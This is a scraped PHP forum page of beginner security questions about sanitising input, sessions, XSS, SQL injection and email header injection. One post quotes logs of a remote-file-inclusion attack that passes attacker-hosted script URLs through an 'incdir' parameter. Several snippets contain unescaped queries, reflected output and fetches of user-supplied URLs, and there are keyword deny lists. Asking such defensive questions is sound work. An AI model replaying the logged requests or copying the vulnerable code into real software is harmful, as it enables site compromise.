|
PHP - Security Question:scrubbing User Input
I am trying to keep the user input clean with this script but can't figure out what is wrong with it.
the error I am getting is Warning: preg_match() expects parameter 1 to be string, $bad_strings = array( "content-type:", "mime-version:", "multipart/mixed", "Content-Transfer-Encoding:", "bcc:", "cc:", "to:", ); if (preg_match($bad_strings, $first_name)) { die; Similar TutorialsHello, I'm creating an application where a user can input there own CSS. The problem I'm having is understanding if this will open security holes if... 1. Users input is saved to a file called style.css 2. Each user is on their own a sub-domain from my reseller hosting plan. 3. The style.css file will be included in the page code like so: Code: [Select] <link type='text/css' rel='stylesheet' href='style.css' /> Any advice? I manage a simple website for a small business - nothin fancy. I'm interested using some php to enhance the site a bit. I'm looking to accept some user input and put it into a database then display it back to them on another page. What php functions would be best to use to accomplish this? Thanks for the input! The PHP code sends me an email from the server, but the user input is empty or "blank". I only receive: "From: \ Email: \ Subject: \ Message: " and that's it. How do I fix my PHP and/or HTML code to receive user input from the form? Attached is my existing HTML and PHP code that doesn't send me any "user input" from the form. Thanks to anyone who can help!!
am I missing anymore input attacks to pass not having 2 of the same balls? Code: [Select] $numbers = "19|20|19"; $numArray = explode("|", $numbers); if ($numArray['0'] == $numArray['1'] OR $numArray['0'] == $numArray['2'] ){ $std->Error2("You cannot pick 2 numbers with the same ticket"); } The if function will see if 19 = 20, or 19 = 20 then I would it need to do $numArray['1'] == $numArray['2'] and so on right to get all possible ways? If so, is there a easier way instead of just using all OR Statements and not manually thinking about what possible way, isn't there just a way to check if 2 arrays are the same? (or 3) Code: [Select] if ($ibforums->input['display1'] == "1"){ // }else{ $std->Error2("You're being Nawty!"); } Ok, this works fine. If they submit anything other then "1" for that input it shows "you're being nawty" but I want it to beable to be anything besides 1 or 0 so I added Code: [Select] if ($ibforums->input['display1'] == "0" OR "1"){ // }else{ $std->Error2("You're being Nawty!"); } and it still let's me submit anything...... i only want my $ibforums->input['display1'] to accept 1 or 0 as a input!!!! I don't want any hackers submitting other input values for this field! any help?! Hey people, I was going over an old script of mine the other day and I ran I web vulnerability scanner on it to see how secure it was and I got an XSS warning, now this puzzles me because I am not entirely sure how this affects the script and what can/can't be done, this script is old so I will paste the relevant bits in here, it was playing with the $page variable. What damage could you do and how would you remedy the problem? Code: [Select] if(isset($_GET['page'])) { if($_GET['page'] > $numpages) { $page = 1; } else { $page = $_GET['page']; } } else { $page = 1; } echo ('<strong style="margin-top: 4px; margin-left: 3px;">Page ' . $page . ' of ' . $numpages . '</strong></p>'); By putting a non-number in there like hello.php?page=Hello, it simply output the word hello so I am not fully sure what the security implications are and how insecure it really is. Might sound like a dumb question but it's been nagging at me. Thanks for reading! Hi, My ISP doesn't allow direct access to mysql Server so I created a bridge and stored the PHP code in the main web folder (https://www.mydomain.com/post.php). The bridge works fine and is used mainly for my IOT projects. In the same web folder, is located the conn.php code containing the server's credentials. The question is, how safe is the PHP code at that location? I can create a subfolder but not sure if it matters as far as security is concerned. TIA Hi everyone! I have a question that might sound silly... I have stored in my database a url to a pic and some other data. I am unsure if when I retreive data from my database I need some sort of protection. I usually sanitize and prevent SQl injections when I code forms but I am not sure if I have to do the same when I get data from the database. Thanks for your help. Veronica HI all, I have a book with some nice examples, but often i wonder if they are that secure for displaying and using outside the production area. One of them is this. A form is created by using a while loop that gets data(email addresses) from a database and shows them with check boxes. after that someone can select the e-mailaddress they don't like and delete them from the database. here is some code: <?php //.... $result = mysqli_query($dbc,$query); while ($row = mysqli_fetch_array($result)){ echo '<input type="checkbox" value"'.$row['id'].'"name="todelete[]"/>'; echo $row['firstname']; } //.........deleting part if (isset($_POST['submit'])){ foreach($_POST['todelete'] as $delete_id){ $query = "DELETE FROM email_list WHERE ID = $delete_id"; mysqli_query ($dbc, $query) or die ('error querying databse'); } } //.... ?> I have two questions: -> is this a smart way of deleting stuff? since you are going to use multiple queries instead of 1 in the for each loop. -> besides not using mysqli_real_escape_string, isn't this application allowing someone to alter the POST-array (todelete) to any value he likes? At least that's what i think can happen. If anyone knows a nice way to do this more secure , I would love to here it, because i don't really trust the html array created. Thanks in advance! Apologies for the lame subject title - I don't know what to call this thread. Last year, before I'd ever opened a book on php, my site was hacked. I was using a third party e-commerce script 'Cart Keeper' (since replaced). Somehow, the hackers planted some files on my server that looked like official bank pages (I'm sure you've all seen the sort of thing). Here are some log files sent by my host at that time... Quote "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:48 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:49 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:59:24 +0100] "GET /arts//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 302 313 "-" "libwww-perl/5.65" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:26 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:28 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:32 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:47 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:48 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:49 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:52 +0100] "GET //ckshop.php?incdir=http://racrew.us/ec.txt?? HTTP/1.1" 200 357 "-" "libwww-perl/5.65" and here is what they wrote to me at the time... Quote The majority of these files where then caught by our egress firewall as they had completed as the file in question had allowed the http user to call a shell and use a variety of code (wget lwp et al) to call in external toolkits. This attack was mostly mechanised, however was changing so it is my belief that the perpetrator was reconfiguring the attack as he went as failures where seen. Please check your site code for possible updates, security updates, and ensure that no files have been changed that should not have been. Please confirm that you have read this mail and are aware of the implications / taking action. Can someone identify the name of this type of attack? ...and possibly a tutorial on securing against this form of attack? As I am learning php, I would like to make sure it doesn't happen again. Many thanks for your help Im making a map atm which will have tokens"not sure what you call them" in the link like map.php?id=token Well I dont want a 3rd party coming along in the future and making their own map using my y and x cords. So I was thinking maybe the best way around this is to use a encryption in the link? so encrypting the x and y cords in the link. Anyone have any ideas on this. Also I was wondering is it impossible for php to know when somone clicks a link? I was googling around and it doesnt seem like you cant simply use a $_POST for a link I have a business social network site on hosting server. I am wondering if sessions are enough secure. ini_set('session.use_only_cookies', 1); //this prevent Session Fixation? session_start(); if($_SESSION['loggedIn'] && $_SESSION['userIP']==$_SERVER["REMOTE_ADDR"]) // extra security //user is logged in, assign all data to this profile from session else //user is not logged in, no data are assigned Would you consider that as enough secure? Hi all, I have heard stories that hackers/viruses or basically something that you don't want uploaded to a server through a website form have been able to type some sort of code in to a html form field to access information. I know how to control the length of fields, how to validate that an email address is in the correct format etc. - but when it comes to having a textfield for the user to add up to 2000 characters of their own words, how can I protect from malicious code being inserted? The textfield is located inside the user area but anyone can join, so anyone ultimately can enter code! Thanks for the help. I have a php page that processes a form. How do I prevent someone from making their own form on their own domain and then saying <form metod=post action = "www.hackerdomain.com/bad.php"> and then passing their own variables? Do I set up a $session variable on my form page and assign it to $_SERVER["PHP_SELF"]? Hi Guys I have built a simple form, which has text fields Name, Telephone Number, Best Time to Call and E-mail. For security purposes, I am testing each against the function shown below which looks for dangerous code snippets, in an effort to protect against email header injection attacks. When it comes to the E-mail field, I am not actually testing whether a valid e-mail address has been entered, as it is the telephone number which is essential, not the e-mail. My question is, do you think this is a security weakness? Many thanks Code: [Select] //http://www.tonyspencer.com/2005/12/15/email-injection-exploit-through-a-php-contact-form/ //preg_match string to match goes within forward slashes, i.e. /str/, and i at the end makes it case insensitive function containsInjectionAttempt($input) { if (preg_match("/\r/i", $input) || preg_match("/\n/i", $input) || preg_match("/%0a/i", $input) || preg_match("/%0d/i", $input) || preg_match("/Content-Type:/i", $input) || preg_match("/<script>/i", $input) || preg_match("/bcc:/i", $input) || preg_match("/to:/i", $input) || preg_match("/cc:/i", $input)) { return true; } else { return false; } } I have a login system that uses a flat file database. The flat file is in a directory outside the public_html. My questions; 1- Is is still possible to hack into that file? Currently I do not encrypt the passwords as I have been told that having the file outside the public_html makes the file unavailable to the public. This allows me the advantage of sending the Username and Password to the user in an email if they forget there password or username. Otherwise- I would have to set up a more complicated method to allow them to change their password to re-gain access to the site. I have an SSL on the site also so I am not worried about packet sniffing. Thanks Hello, all: I'm a newbie and I'm trying to understand the whole php security thing a bit better, and found this function that seems easy to implement, as well as easy to understand... my question is... Does this means I could use regular $_POST, $_GET, $_COOKIE, $_REQUEST variables without having to individually worry about escaping them every time I use them in queries... is this correct? or safe enough? see example below, along with how I'm using variable in a query... it seems to be working fine, as it does echo out the \ escape character when I test it, or when I try to inject it... Appreciate your input! Code: [Select] <?php $_POST=sanitize($_POST); $_GET=sanitize($_GET); $_COOKIE=sanitize($_COOKIE); $_REQUEST=sanitize($_REQUEST); function sanitize($input){ if(is_array($input)){ foreach($input as $k=>$i){ $output[$k]=sanitize($i); } } else{ if(get_magic_quotes_gpc()){ $input=stripslashes($input); } $output=mysql_real_escape_string($input); } return $output; } // mysql query then I could use be: $money = $_GET['money']; $result = mysql_query("SELECT * FROM countries WHERE currencies = '$money'"); ?> Hey guys! I'm pretty new to php and starting work on a project, the first part I'm working on is a html page with text fields like this: Quote URL: Dropdown box: Submit when the submit happens I want it to post to a php page, parse whatever is inside a set of <h2> tags and print it to to the php page, also the user selects four options from the dropdown box and I need to print the string contained in the selection to the next page as well, As I said I'm pretty new but here's what i threw together so far based on references I found, but it doesn't work correctly: parse.html: Code: [Select] <html> <body> <form action="parse.php" method="post"> URL: <input type="text" name="turl" /> <br> Option: <select name="selectskill"> <option value="1">Low</option> <option value="2">Mid</option> <option value="3">High</option> <option value="4">Known</option> </select> <br> <br> <input type="submit" /> </form> </body> </html> parse.php: Code: [Select] <html> <head></head> <body> <?php $lol = $_POST["turl"]; $str = file_get_contents($lol); $DOM = new DOMDocument; $DOM->loadHTML($str); // Grab text inside the heading 2 tags $items = $DOM->getElementsByTagName('h2'); echo "option: " . $lol; // Display the content inside the second set of H2 tags echo $items->item(1)->nodeValue . "<br/>"; ?> </body> </head> </html> Thanks for all the help in advance! I appreciate your help guys. I was able to do something to the code. Now it looks like this: <?php include "include/dbc.php"; include "include/header.inc"; ?> <script type="text/javascript"> <!--Hide Code // Function Statements //Function to confirm submit function confirmSubmit() { var submitform = window.confirm("Are you sure you want to submit the activities?"); if (submitform == true) return validateForm(); return false; } // End Hide--> </script> <style type="text/css"> .mydate{ color:#00F; text-decoration:underline; cursor:pointer; } </style> <script type="text/javascript"> function displayDate(d){ var date=new Date(); var D=date.getDate(); date.setDate(D+d); var YYYY=date.getFullYear(); var MM=date.getMonth()+1; MM<10?MM='0'+MM:null; var DD=date.getDate(); DD<10?DD='0'+DD:null; var span=document.getElementById('date'); span.innerHTML= 'Entries for '+MM+'/'+DD+'/'+YYYY; } onload=function(){displayDate(0)}; </script> <h1>Food Diary</h1> <div class="full"> <center><div><span class="mydate" onclick="displayDate(-1)"><img src="images/left_arrow.png" border="0">Yesterday</span> <span id="date" style="font-size:2em;"></span> <span class="mydate" onclick="displayDate(1)">Tomorrow<img src="images/right_arrow.png" border="0"></span></div><br /> <a href="#" onclick="displayDate(0);return false;">Today</a> </center> <div class="full"> <form name="exercise" id="exercise" method="GET" action=""> <center><table> <tr> <td><h3>Add an Activity</h3></td> </tr> <tr> <td><input name="NewSearchString" style="width: 100px" type="text"/> <input type="submit" value="Search" /> </td> </tr> <tr> <td> <select name="activity"> <option value="_">Activity Browse...</option> <option value="all">All Activities</option> <option value="biking">Biking</option> <option value="condition">Conditioning</option> <option value="dancing">Dancing</option> <option value="fish">Fishing & Hunting</option> <option value="Home">Home Activities</option> <option value="misc">Miscellaneous</option> <option value="music">Music Playing</option> <option value="occupation">Occupation</option> <option value="running">Running</option> <option value="sports">Sports</option> <option value="walking">Walking</option> <option value="water">Water Activities</option> <option value="winter">Winter Activities</option> </select> <input type="submit" value="Submit" /></td></tr></table></center></form> </td> </tr> </table> </center> <table width="100%"> <tr bgcolor="#66CC33"> <td><div>Activity</div></td> <td><div>Specific Activity</div></td> <td><div>Time (hh:mm)</div></td> <td><div>Distance</div></td> <td><div>Units</div></td> </tr> <tr bgcolor="#66CC33"> <td><div></div></td> <td><div></div></td> <td><div></div></td> <td><div class="Float"></div></td> <td class="cp_Distance"><div></div></td> </tr> <?php if(isset($_GET[activity])) { $category=$_GET[activity]; $result = mysql_query("SELECT * FROM exercise WHERE type='$category'"); ?> <form action="add_activity.php" method="POST"> <?php while($row = mysql_fetch_array($result)) { echo '<tr><td><div>'.$row[Type].'</div></td>'; echo '<td><div>'.$row[Name].'<input type="hidden" name="exerciseid" value="'.$row[Name].'"></div></td>'; echo '<td><div><input type="text" name="duration['.$row['Name'].']"></div></td>'; echo '<td><div><input type="text" name="distance['.$row['Name'].']"></div></td>'; echo '<td><div><select> <option value="mile" name="mile">mile</option> <option value="Km" name="Km">km</option> <option value="M" name="M">m</option> <option value="Yard" name="yard">yrd</option> <option value="Feet" name="feet">ft</option> </select></div></td></tr>'; } mysql_close(); ?> <tr><td colspan="6" align="center"><input type="submit" name="submit" value="Add Activities"></td></tr> </form> <?php } ?> <tr bgcolor="#66CC33"> <td><div></div></td> <td><div></div></td> <td><div></div></td> <td><div class="Float"></div></td> <td class="cp_Distance"><div></div></td> </tr></table> This somewhat works. The problem is that this code passes all the activities to the second page, where the output looks like this: Array ( [exerciseid] => Hunting, general [duration] => Array ( [Fishing from boat, sitting] => 20 [Fishing from river bank, standing] => [Fishing in stream, in waders] => [Fishing, general] => [Fishing, ice, sitting] => [Hunting, general] => ) [distance] => Array ( [Fishing from boat, sitting] => 25 [Fishing from river bank, standing] => [Fishing in stream, in waders] => [Fishing, general] => [Fishing, ice, sitting] => [Hunting, general] => ) [submit] => Add Activities ) Is there a way I can pass what the user input instead of passing everything (form validation maybe?) Hi, what is they best way to validate user input of strings? A couple of examples would be : 1> If i wanted to check for the existance on the coma ',' character in a string and replace it with a dash '-' character? 2> To check wether a user has entered a valid ip address in the form of x.x.x.x where x can range from 0-255? I think i may need ereg/preg to do this but i have no idea about how to layout the syntax. Thanks for looking. |
|||||||